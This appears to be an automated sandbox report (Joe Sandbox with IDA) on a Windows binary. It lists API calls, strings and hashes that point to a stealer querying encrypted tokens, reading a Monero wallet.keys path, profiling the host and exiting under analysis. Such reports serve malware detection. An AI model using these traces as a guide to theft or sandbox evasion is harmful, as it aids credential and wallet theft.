Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: f0d6c11b5859e176e8ff4b3db5747afe438e9307edc743f82521428ee02b0d94
Instruction ID: d289ed3fe18740d39d9b48b48a81d76e40b0a0d4542696b51146bb55f7c06e39
Opcode Fuzzy Hash: f0d6c11b5859e176e8ff4b3db5747afe438e9307edc743f82521428ee02b0d94
Instruction Fuzzy Hash: B9B12972910108ABDF04EBA0DD96FEE7379AF94300F404568F546B7092EF746A49CFA6

Function 00924FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00924FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00924FD1
InternetOpenA.WININET(00940DDF,00000000,00000000,00000000,00000000), ref: 00924FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00925011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00925041
InternetCloseHandle.WININET(?), ref: 009250B9
InternetCloseHandle.WININET(?), ref: 009250C6

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: fd76b5b1529ecf580da9e07a0774e6adffccf8148e3c5f15556f299ddc02f1a0
Instruction ID: 0db3fb54d1e1f4e29bef5e1bc3d3bafb23d4d977f00b06586de5d6d733e1ef9f
Opcode Fuzzy Hash: fd76b5b1529ecf580da9e07a0774e6adffccf8148e3c5f15556f299ddc02f1a0
Instruction Fuzzy Hash: CA31E4B4A40218ABDB20CF54DC85BDDB7B4EB48704F1081D9EA09B7285DBB46E858F99

Function 00938100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,006FE5E0,00000000,?,00940E2C,00000000,?,00000000), ref: 00938130
RtlAllocateHeap.NTDLL(00000000), ref: 00938137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00938158
wsprintfA.USER32 ref: 009381AC

Strings

%d MB, xrefs: 009381A3
@, xrefs: 0093814D

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2922868504-3474575989
Opcode ID: ac6d6e9a7a27812871f5be2e493ec67312e290dd8de72c5f48ff1f019b2174df
Instruction ID: 8b4e4b41c0da2525c338534038c1e5f4824a8b57366463d143b406f799177038
Opcode Fuzzy Hash: ac6d6e9a7a27812871f5be2e493ec67312e290dd8de72c5f48ff1f019b2174df
Instruction Fuzzy Hash: DA21C9B1A44218ABDB00DFD4DD49FAFB7B8EB44B14F104519F605BB2C0DBB869018FA5

Function 009383DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00938426
wsprintfA.USER32 ref: 00938459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0093847B
RegCloseKey.ADVAPI32(00000000), ref: 0093848C
RegCloseKey.ADVAPI32(00000000), ref: 00938499

Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6

RegQueryValueExA.KERNEL32(00000000,006FE550,00000000,000F003F,?,00000400), ref: 009384EC
lstrlen.KERNEL32(?), ref: 00938501
RegQueryValueExA.KERNEL32(00000000,006FE5C8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00940B34), ref: 00938599
RegCloseKey.KERNEL32(00000000), ref: 00938608
RegCloseKey.ADVAPI32(00000000), ref: 0093861A

Strings

%s\%s, xrefs: 0093844D

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 8c2456391c06deef7af23be6feb5dac934a1a648d3b9ea69f235db027ca72a7c
Instruction ID: f865eb39999f6c38296836612bd85990cee589931772a83f0dbd64339a230731
Opcode Fuzzy Hash: 8c2456391c06deef7af23be6feb5dac934a1a648d3b9ea69f235db027ca72a7c
Instruction Fuzzy Hash: 8F21E7B1910218ABDB24DB54DC85FE9B3B8FB88704F00C598E609A7180DF75AA85CFD4

Function 00937690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 009376A4
RtlAllocateHeap.NTDLL(00000000), ref: 009376AB
RegOpenKeyExA.KERNEL32(80000002,006EC410,00000000,00020119,00000000), ref: 009376DD
RegQueryValueExA.KERNEL32(00000000,006FE580,00000000,00000000,?,000000FF), ref: 009376FE
RegCloseKey.ADVAPI32(00000000), ref: 00937708

Strings

Windows 11, xrefs: 009376BD

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: a28798df56fb0e181b22e434e2851ba0d6facce5a666bddb815e7b86a8afc337
Instruction ID: 4ac8724752521ee154a17441054bf3ae71770d25fc98ad3cf40f1e62994c0ebb
Opcode Fuzzy Hash: a28798df56fb0e181b22e434e2851ba0d6facce5a666bddb815e7b86a8afc337
Instruction Fuzzy Hash: 75014FB5A04208BBDB10DBE4DD49F69B7BCEB48701F104454FA05A72D1EAB899008F52

Function 00937720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937734
RtlAllocateHeap.NTDLL(00000000), ref: 0093773B
RegOpenKeyExA.KERNEL32(80000002,006EC410,00000000,00020119,009376B9), ref: 0093775B
RegQueryValueExA.KERNEL32(009376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0093777A
RegCloseKey.ADVAPI32(009376B9), ref: 00937784

Strings

CurrentBuildNumber, xrefs: 00937771

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: fa865f44ef6c1a63bb833693f231fa893c01eb02212dc8eb263e5c80dfbd34cb
Instruction ID: 77aede2e0d0afaa246edac354af8a44b64e26a35e1c63519bc7623da698c1a89
Opcode Fuzzy Hash: fa865f44ef6c1a63bb833693f231fa893c01eb02212dc8eb263e5c80dfbd34cb
Instruction Fuzzy Hash: 0F01F4B5A40308BBDB10DBE4DC4AFAEB7B8EB44705F104555FA05A72C1DAB469008F51

Function 009369F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00939860: GetProcAddress.KERNEL32(75900000,006F0D70), ref: 009398A1
Part of subcall function 00939860: GetProcAddress.KERNEL32(75900000,006F0DE8), ref: 009398BA
Part of subcall function 00939860: GetProcAddress.KERNEL32(75900000,006F0D10), ref: 009398D2
Part of subcall function 00939860: GetProcAddress.KERNEL32(75900000,006F0E78), ref: 009398EA
Part of subcall function 00939860: GetProcAddress.KERNEL32(75900000,006F0CC8), ref: 00939903
Part of subcall function 00939860: GetProcAddress.KERNEL32(75900000,006F8FA8), ref: 0093991B
Part of subcall function 00939860: GetProcAddress.KERNEL32(75900000,006E4EE0), ref: 00939933
Part of subcall function 00939860: GetProcAddress.KERNEL32(75900000,006E4DC0), ref: 0093994C
Part of subcall function 00939860: GetProcAddress.KERNEL32(75900000,006F0EA8), ref: 00939964
Part of subcall function 00939860: GetProcAddress.KERNEL32(75900000,006F0C38), ref: 0093997C
Part of subcall function 00939860: GetProcAddress.KERNEL32(75900000,006F0C98), ref: 00939995
Part of subcall function 00939860: GetProcAddress.KERNEL32(75900000,006F0CB0), ref: 009399AD
Part of subcall function 00939860: GetProcAddress.KERNEL32(75900000,006E4DE0), ref: 009399C5
Part of subcall function 00939860: GetProcAddress.KERNEL32(75900000,006F0BF0), ref: 009399DE

Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788

Part of subcall function 009211D0: ExitProcess.KERNEL32 ref: 00921211

Part of subcall function 00921160: GetSystemInfo.KERNEL32(?), ref: 0092116A
Part of subcall function 00921160: ExitProcess.KERNEL32 ref: 0092117E

Part of subcall function 00921110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0092112B
Part of subcall function 00921110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00921132
Part of subcall function 00921110: ExitProcess.KERNEL32 ref: 00921143

Part of subcall function 00921220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0092123E
Part of subcall function 00921220: ExitProcess.KERNEL32 ref: 00921294

Part of subcall function 00936770: GetUserDefaultLangID.KERNEL32 ref: 00936774

Part of subcall function 00921190: ExitProcess.KERNEL32 ref: 009211C6

Part of subcall function 00937850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009211B7), ref: 00937880
Part of subcall function 00937850: RtlAllocateHeap.NTDLL(00000000), ref: 00937887
Part of subcall function 00937850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0093789F

Part of subcall function 009378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937910
Part of subcall function 009378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00937917
Part of subcall function 009378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0093792F

Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,006F9228,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12

Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006F8FB8,?,0094110C,?,00000000,?,00941110,?,00000000,00940AEF), ref: 00936ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00936AE8
CloseHandle.KERNEL32(00000000), ref: 00936AF9
Sleep.KERNEL32(00001770), ref: 00936B04
CloseHandle.KERNEL32(?,00000000,?,006F8FB8,?,0094110C,?,00000000,?,00941110,?,00000000,00940AEF), ref: 00936B1A
ExitProcess.KERNEL32 ref: 00936B22

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2931873225-0
Opcode ID: 23d53686c421a099530d7605b2400d9eaad1fe3cef2b0cf4c4578b4596ff5d9a
Instruction ID: b6b62bcc899827b610d373a46db5e5e54431e5814be17349b3397882e9da346a
Opcode Fuzzy Hash: 23d53686c421a099530d7605b2400d9eaad1fe3cef2b0cf4c4578b4596ff5d9a
Instruction Fuzzy Hash: 6F31EA71904218AADB04FBF0DC56BFEB778AF94740F104528F252B61D2DFB46A05CEA6

Function 009299C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
LocalFree.KERNEL32(0092148F), ref: 00929A90
CloseHandle.KERNEL32(000000FF), ref: 00929A9A

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
